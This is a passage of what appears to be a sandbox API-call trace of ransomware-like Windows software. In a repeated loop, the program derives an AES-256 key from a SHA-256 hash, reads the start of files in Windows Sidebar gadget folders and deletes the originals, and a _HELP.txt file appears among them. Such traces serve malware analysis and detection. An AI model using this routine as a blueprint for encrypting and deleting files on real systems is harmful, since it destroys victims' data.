Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.108] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.108] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.109] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0191.109] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdc [0191.109] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.110] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0191.111] CryptDestroyKey (hKey=0x284d568) returned 1 [0191.111] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.112] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile16.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile16.png")) returned 0 [0191.113] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.114] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.114] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.114] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0191.114] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcd9 [0191.114] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.117] CryptDestroyHash (hHash=0x284d528) returned 1 [0191.117] CryptDestroyKey (hKey=0x284d568) returned 1 [0191.117] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.119] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_bezel.png")) returned 0 [0191.119] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.120] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.120] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.120] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0191.120] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb43 [0191.120] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.122] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0191.122] CryptDestroyKey (hKey=0x284d568) returned 1 [0191.122] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.124] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png")) returned 0 [0191.128] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.129] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.129] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.129] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0191.129] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd3c [0191.129] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.132] CryptDestroyHash (hHash=0x284d528) returned 1 [0191.132] CryptDestroyKey (hKey=0x284d568) returned 1 [0191.132] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.133] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png")) returned 0 [0191.155] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.155] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.155] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.155] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0191.155] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd37 [0191.155] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.164] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0191.165] CryptDestroyKey (hKey=0x284d568) returned 1 [0191.165] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.167] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png")) returned 0 [0191.168] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.168] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.168] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.168] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0191.168] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xce4 [0191.168] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.170] CryptDestroyHash (hHash=0x284d528) returned 1 [0191.170] CryptDestroyKey (hKey=0x284d568) returned 1 [0191.171] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.172] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_up.png")) returned 0 [0191.172] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.173] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.173] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.173] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0191.173] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0191.173] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.174] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0191.174] CryptDestroyKey (hKey=0x284d568) returned 1 [0191.174] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.175] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\_HELP.txt" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\_help.txt")) returned 1 [0191.176] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0191.177] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0191.177] CryptHashData (hHash=0x284d668, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.177] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0191.177] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1816 [0191.177] ReadFile (in: hFile=0x584, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0191.186] CryptDestroyHash (hHash=0x284d668) returned 1 [0191.186] CryptDestroyKey (hKey=0x284d528) returned 1 [0191.186] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.187] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\logo.png")) returned 0 [0191.188] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0191.205] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0191.205] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0191.205] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.205] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0191.205] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2141 [0191.206] ReadFile (in: hFile=0x5ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0191.237] CryptDestroyHash (hHash=0x284d568) returned 1 [0191.237] CryptDestroyKey (hKey=0x284d528) returned 1 [0191.237] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.238] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\drag.png")) returned 0 [0191.238] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0191.239] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0191.239] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0191.240] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0191.240] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.240] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0191.240] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb92 [0191.240] ReadFile (in: hFile=0x598, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0191.262] CryptDestroyHash (hHash=0x284d568) returned 1 [0191.262] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0191.262] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.263] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\flyout.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\flyout.css")) returned 0 [0191.279] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0191.279] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0191.279] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.279] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0191.279] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbc8 [0191.279] ReadFile (in: hFile=0x5b0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0191.290] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0191.290] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0191.290] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.291] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\RSSFeeds.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\rssfeeds.css")) returned 0 [0191.291] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0191.292] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0191.292] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.292] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0191.292] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4e6 [0191.292] ReadFile (in: hFile=0x598, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0191.295] CryptDestroyHash (hHash=0x284d568) returned 1 [0191.295] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0191.295] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.296] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\settings.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\settings.css")) returned 0 [0191.299] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.299] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.299] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.299] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0191.299] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x86a [0191.299] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.302] CryptDestroyHash (hHash=0x284d528) returned 1 [0191.302] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0191.302] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.303] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\flyout.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\flyout.html")) returned 0 [0191.304] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.305] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.305] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.305] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0191.305] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3ed [0191.305] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.324] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0191.324] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0191.324] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.326] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\gadget.xml")) returned 0 [0191.326] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0191.333] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0191.334] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0191.334] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.334] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0191.334] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1aee4 [0191.334] ReadFile (in: hFile=0x5b0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0191.474] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0191.474] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0191.474] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.475] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\RSSFeeds.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\js\\rssfeeds.js")) returned 0 [0191.610] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0191.611] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0191.611] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.611] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0191.611] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x15a6 [0191.611] ReadFile (in: hFile=0x598, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0191.614] CryptDestroyHash (hHash=0x284d568) returned 1 [0191.614] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0191.614] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.615] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\js\\settings.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\js\\settings.js")) returned 0 [0191.616] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.616] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.616] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.616] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0191.616] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x271c [0191.616] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.619] CryptDestroyHash (hHash=0x284d528) returned 1 [0191.619] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0191.619] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.621] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\rssfeeds.html")) returned 0 [0191.621] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0191.621] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0191.621] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.622] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0191.622] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcfe [0191.622] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0191.624] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0191.624] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0191.624] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0191.625] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\settings.html")) returned 0 [0191.626] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0191.627] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0191.627] CryptHashData (hHash=0x284d668, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.627] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: 